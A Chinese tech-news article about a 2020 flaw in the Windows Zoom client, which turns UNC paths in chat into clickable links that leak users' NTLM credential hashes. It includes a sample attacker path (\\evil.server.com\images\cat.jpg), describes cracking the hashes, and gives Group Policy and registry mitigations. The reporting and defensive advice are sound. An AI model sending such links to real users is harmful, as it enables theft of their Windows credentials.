当前位置:资讯 > 正文

Zoom客户端被曝可向攻击者泄露Windows登陆凭据

2020-04-01 16:38:49  来源:cnBeta

近日,Windows 版 Zoom 客户端爆出了容易受到 NUC 路径注入攻击的安全漏洞。作为一款音视频会议应用,Zoom 还允许用户在聊天界面通过发送文本消息来互相交流。然而外媒 Bleeping Computer 指出,攻击者可利用聊天模块的漏洞,窃取点击了相关链接的用户的 Windows 登陆凭据。

1 remote-share.png

【UNC 注入示例】

发送聊天消息时,所有发送的 URL 都将经过转换,以便群内其他成员点击,继而在默认的浏览器中打开网页。

然而安全研究人员 @ _g0dmode 发现,Zoom 客户端竟然还将Windows网络 UNC 路径,也转换成了聊天消息中可单击的链接。

如图所示,常规 URL 和 NUC 路径(\\evil.server.com\images\cat.jpg),都被转换成了聊天消息中的可点击链接。

2 capturing-password-hashes.png

【捕获的 NTLM 密码哈希值】

若用户单击 UNC 路径链接,则 Windows 将尝试使用 SMB 文件共享协议连接到远程站点,以打开远程路径中的 cat.jpg 文件。

默认情况下,Windows 将发送用户的登录名和 NTLM 密码哈希值,但稍有经验的攻击者均可借助 Hashcat 之类的免费工具来逆向运算。

3 password-cracker.jpg

【简单密码可在 16 秒内被暴力破解】

安全研究人员 Matthew Hickey(@ HackerFantastic)实测发现,其能够在 Zoom 中顺利注入,并且可以借助当前的民用级 GPU 和 CPU 来快速破解。

除了窃取 Windows 登陆凭据,Hickey 还向 Bleeping Computer 透露,通过点击链接的方式,UNC 注入还适用于启动本地计算机上的程序(比如 CMD 命令提示符)。

4 launch-program.png

【程序运行提示】

庆幸的是,Windows 会在程序被执行前发出是否允许其运行的提示。想要堵上这一漏洞,Zoom 必须阻止 Windows 客户端的 UNC 路径转换功能(屏蔽部分可点击的超链接)。

据悉,Hickey 已经在 Twitter 上向 Zoom 官方发去了有关该安全漏洞的通知,但目前尚不清楚该公司已采取怎样的行动。

5 group-policy-2.png

注重安全的客户,可在官方补丁发布前,通过组策略来限制向远程服务器传出 NTLM 通信(参考如下操作):

计算机配置 -> Windows 设置 -> 安全设置 -> 本地策略 -> 安全选项 -> 网络安全:限制NTLM -> 发送到远程服务器的 NTLM 通信(然后全部配置为拒绝)。

6.png

需要注意的是,如果在已经加入相关域的计算机上配置上述组策略时,可能会在尝试访问共享时遇到问题。

如果是无权访问组策略设置 Windows 10 家庭版用户,亦可使用注册表编辑器来完成相关限制操作(dword 配置为 2):

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]"RestrictSendingNTLMTraffic"=dword:00000002

7 registry-editor.png

如需正确创建此键值,Windows 用户记得以管理员身份来启动注册表编辑器。

若日后有必要恢复默认发送 NTLM 凭据的 Windows 行为,也只需删除对应的 RestrictSendingNTLMTraffic 键值。

推荐阅读

暗藏96Hz刷新率模式?教你一键解锁三星S20隐藏彩蛋

今年的三星S20全系都支持了120Hz高刷新率,表明了手机一哥同时也是面板一哥对行业未来发展趋势的判断。不过,出于平衡功耗,开启120Hz时屏 【详细】

神奇!OPPO官宣10米隔空充电技术

4月1日消息,OPPO官宣OPPO Ace infinity新机,搭载全球首发的FreeVOOC隔空充电技术,可在10米内实现5-10W的稳定充电功率,手机在哪,电量 【详细】

努比亚红魔3游戏手机5G网络成"空头支票"?

5G网络的风口上,一些所谓的5G产品可能只是企业炒作的噱头,并未在产品技术和售后服务上落到实处。近日,多位努比亚红魔3系列手机的用户向 【详细】

腾讯将为联合国成立75周年提供全面技术方案

北京时间3月31日上午消息,联合国于美东时间3月30日在纽约总部宣布,腾讯公司成为其全球合作伙伴,为联合国成立75周年提供全面技术方案,并 【详细】

三星将于年底前彻底退出液晶面板市场

据路透社报道,韩国面板制造商Samsung Display的一位发言人于本周一表示,该公司已决定在今年年底前结束其位于中国和韩国的所有LCD面板生 【详细】

关于我们  |  联系方式  |  免责条款  |  招聘信息  |  广告服务  |  帮助中心

联系我们:435 203 [email protected]

科技新闻网 版权所有